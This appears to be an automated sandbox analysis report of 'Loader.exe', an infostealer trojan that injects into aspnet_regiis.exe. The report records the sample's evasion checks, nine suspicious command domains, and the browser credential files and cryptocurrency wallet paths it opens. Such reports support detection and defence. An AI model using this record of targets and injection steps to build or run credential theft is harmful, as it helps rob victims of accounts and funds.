Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_033BAC04
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_033C4C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_033D4C50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_033994BF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033B94943_2_033B9494
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033AECDE3_2_033AECDE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033B7CD23_2_033B7CD2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0339ECC03_2_0339ECC0
              Source: C:\Users\user\Desktop\Loader.exeCode function: String function: 6E4F8610 appears 33 times
              Source: C:\Users\user\Desktop\Loader.exeCode function: String function: 6E5266A0 appears 87 times
              Source: C:\Users\user\Desktop\Loader.exeCode function: String function: 6E516CC0 appears 65 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 0339C8C0 appears 71 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 033AC2A0 appears 176 times
              Source: Loader.exe, 00000000.00000002.2133612238.0000000000DBE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Loader.exe
              Source: Loader.exeBinary or memory string: OriginalFilenameNathanOliviaChloe.YpP vs Loader.exe
              Source: Loader.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: Loader.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/2@1/1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_033C3950 CoCreateInstance,3_2_033C3950
              Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Roaming\gdi32.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4232:120:WilError_03
              Source: Loader.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: Loader.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
              Source: C:\Users\user\Desktop\Loader.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: aspnet_regiis.exe, 00000003.00000003.2169111393.00000000036A3000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2154923285.0000000005B0A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2168913374.0000000005B27000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2154642914.0000000005B28000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: Loader.exeReversingLabs: Detection: 42%
              Source: unknownProcess created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"
              Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
              Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
              Source: Loader.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: Loader.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Data Obfuscation

              Source: Loader.exe, -Module-.cs | .Net Code: _200D_200B_200E_202A_206A_206C_200F_206D_200E_206A_206A_202E_200D_202B_206A_206F_202A_202C_206A_202B_200E_206A_202B_200E_202E_202A_202E_202E_202D_206D_200D_206C_202C_200B_206D_202D_200B_206E_200B_202C_202E System.Reflection.Assembly.Load(byte[])
              Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6E503804 push ecx; ret 0_2_6E503817
              Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_00DA3866 push 00000035h; retf 0_2_00DA3869
              Source: Loader.exe | Static PE information: section name: .text entropy: 7.856893494807448
              Source: C:\Users\user\Desktop\Loader.exe | File created: C:\Users\user\AppData\Roaming\gdi32.dll
              Source: C:\Users\user\Desktop\Loader.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Loader.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Loader.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Loader.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Loader.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Loader.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Loader.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Loader.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Loader.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Loader.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Loader.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Loader.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Loader.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Loader.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Loader.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Loader.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Loader.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: Yara match | File source: Process Memory Space: Loader.exe PID: 4560, type: MEMORYSTR
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | System information queried: FirmwareTableInformation
              Source: C:\Users\user\Desktop\Loader.exe | Memory allocated: DA0000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\Loader.exe | Memory allocated: 2D20000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\Loader.exe | Memory allocated: 2B20000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\Loader.exe | Memory allocated: 5170000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\Loader.exe | Memory allocated: 6170000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\Loader.exe | Memory allocated: 62A0000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\Loader.exe | Memory allocated: 72A0000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\Loader.exe | Memory allocated: 7630000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\Loader.exe | Memory allocated: 8630000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\Loader.exe | Memory allocated: 9630000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\Loader.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\Loader.exe TID: 6484 | Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe TID: 5972 | Thread sleep time: -90000s >= -30000s
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6E4FCB0B FindFirstFileExW
              Source: C:\Users\user\Desktop\Loader.exe | Thread delayed: delay time: 922337203685477
              Source: aspnet_regiis.exe, 00000003.00000003.2169181954.0000000005B4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
              Source: aspnet_regiis.exe, 00000003.00000003.2169181954.0000000005B4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
              Source: aspnet_regiis.exe, 00000003.00000003.2169181954.0000000005B4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
              Source: aspnet_regiis.exe, 00000003.00000003.2169181954.0000000005B4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696487552f
              Source: aspnet_regiis.exe, 00000003.00000003.2169181954.0000000005B4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696487552x
              Source: aspnet_regiis.exe, 00000003.00000003.2169181954.0000000005B4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
              Source: aspnet_regiis.exe, 00000003.00000003.2169181954.0000000005B4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696487552
              Source: aspnet_regiis.exe, 00000003.00000002.2236456187.00000000035EC000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2236456187.0000000003620000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
              Source: aspnet_regiis.exe, 00000003.00000003.2169181954.0000000005B4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
              Source: aspnet_regiis.exe, 00000003.00000003.2169181954.0000000005B4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
              Source: aspnet_regiis.exe, 00000003.00000003.2169181954.0000000005B4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696487552
              Source: aspnet_regiis.exe, 00000003.00000003.2169181954.0000000005B4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696487552o
              Source: aspnet_regiis.exe, 00000003.00000003.2169054454.0000000005B5C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: - GDCDYNVMware20,11696487552p
              Source: aspnet_regiis.exe, 00000003.00000003.2169181954.0000000005B4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696487552
              Source: aspnet_regiis.exe, 00000003.00000003.2169181954.0000000005B4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
              Source: aspnet_regiis.exe, 00000003.00000003.2169181954.0000000005B4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696487552
              Source: aspnet_regiis.exe, 00000003.00000003.2169181954.0000000005B4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696487552j
              Source: aspnet_regiis.exe, 00000003.00000003.2169181954.0000000005B4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
              Source: aspnet_regiis.exe, 00000003.00000003.2169181954.0000000005B4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
              Source: aspnet_regiis.exe, 00000003.00000003.2169181954.0000000005B4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
              Source: aspnet_regiis.exe, 00000003.00000003.2154322168.0000000003677000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: gFHNSRWNQuMfmd1lSKnRfXzO/vNgRSts+PyOlZzV7C6fEuIETcpVqEmungkL/9As]
              Source: aspnet_regiis.exe, 00000003.00000003.2169181954.0000000005B4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
              Source: aspnet_regiis.exe, 00000003.00000003.2169181954.0000000005B4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
              Source: aspnet_regiis.exe, 00000003.00000003.2169181954.0000000005B4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
              Source: aspnet_regiis.exe, 00000003.00000003.2169181954.0000000005B4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696487552t
              Source: aspnet_regiis.exe, 00000003.00000003.2169181954.0000000005B4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
              Source: aspnet_regiis.exe, 00000003.00000003.2169181954.0000000005B4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
              Source: aspnet_regiis.exe, 00000003.00000003.2169181954.0000000005B4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
              Source: aspnet_regiis.exe, 00000003.00000003.2169181954.0000000005B4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696487552s
              Source: aspnet_regiis.exe, 00000003.00000003.2169181954.0000000005B4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
              Source: aspnet_regiis.exe, 00000003.00000003.2169181954.0000000005B4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696487552t
              Source: aspnet_regiis.exe, 00000003.00000003.2169181954.0000000005B4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
              Source: aspnet_regiis.exe, 00000003.00000003.2169181954.0000000005B4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
              Source: aspnet_regiis.exe, 00000003.00000003.2169181954.0000000005B4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Process information queried: ProcessInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_033D0D90 LdrInitializeThunk
              Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6E4FC45A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
              Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6E4FE22F GetProcessHeap
              Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6E4F7FC1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
              Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6E4FC45A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
              Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6E4F849A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
              Source: C:\Users\user\Desktop\Loader.exe | Memory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\Desktop\Loader.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 3390000 protect: page execute and read and write
              Source: C:\Users\user\Desktop\Loader.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 3390000 value starts with: 4D5A
              Source: Loader.exe | String found in binary or memory: opposezmny.site
              Source: Loader.exe | String found in binary or memory: seallysl.site
              Source: Loader.exe | String found in binary or memory: mafnufacut.cyou
              Source: Loader.exe | String found in binary or memory: faulteyotk.site
              Source: Loader.exe | String found in binary or memory: dilemmadu.site
              Source: Loader.exe | String found in binary or memory: contemteny.site
              Source: Loader.exe | String found in binary or memory: goalyfeastz.site
              Source: Loader.exe | String found in binary or memory: servicedny.site
              Source: Loader.exe | String found in binary or memory: authorisev.site
              Source: C:\Users\user\Desktop\Loader.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 3390000
              Source: C:\Users\user\Desktop\Loader.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 3391000
              Source: C:\Users\user\Desktop\Loader.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 33D6000
              Source: C:\Users\user\Desktop\Loader.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 33D9000
              Source: C:\Users\user\Desktop\Loader.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 33E9000
              Source: C:\Users\user\Desktop\Loader.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 3391000
              Source: C:\Users\user\Desktop\Loader.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 33D6000
              Source: C:\Users\user\Desktop\Loader.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 33D9000
              Source: C:\Users\user\Desktop\Loader.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 33E9000
              Source: C:\Users\user\Desktop\Loader.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 3130008
              Source: C:\Users\user\Desktop\Loader.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
              Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6E4F8658 cpuid
              Source: C:\Users\user\Desktop\Loader.exe | Queries volume information: C:\Users\user\Desktop\Loader.exe VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6E4F80E3 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: aspnet_regiis.exe PID: 2096, type: MEMORYSTR
              Source: Yara match | File source: sslproxydump.pcap, type: PCAP
              Source: aspnet_regiis.exe, 00000003.00000003.2198915406.000000000368D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/Electrum
              Source: aspnet_regiis.exe, 00000003.00000003.2198915406.000000000368D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/ElectronCash
              Source: aspnet_regiis.exe, 00000003.00000003.2154322168.000000000368B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Jaxx Liberty
              Source: aspnet_regiis.exe, 00000003.00000003.2198915406.000000000368D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: window-state.json
              Source: aspnet_regiis.exe, 00000003.00000003.2198933386.0000000003677000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ExodusWeb3
              Source: aspnet_regiis.exe, 00000003.00000003.2198915406.000000000368D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Ethereum
              Source: aspnet_regiis.exe, 00000003.00000002.2236456187.0000000003620000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: aspnet_regiis.exe, 00000003.00000003.2198979767.000000000368B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: keystore
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
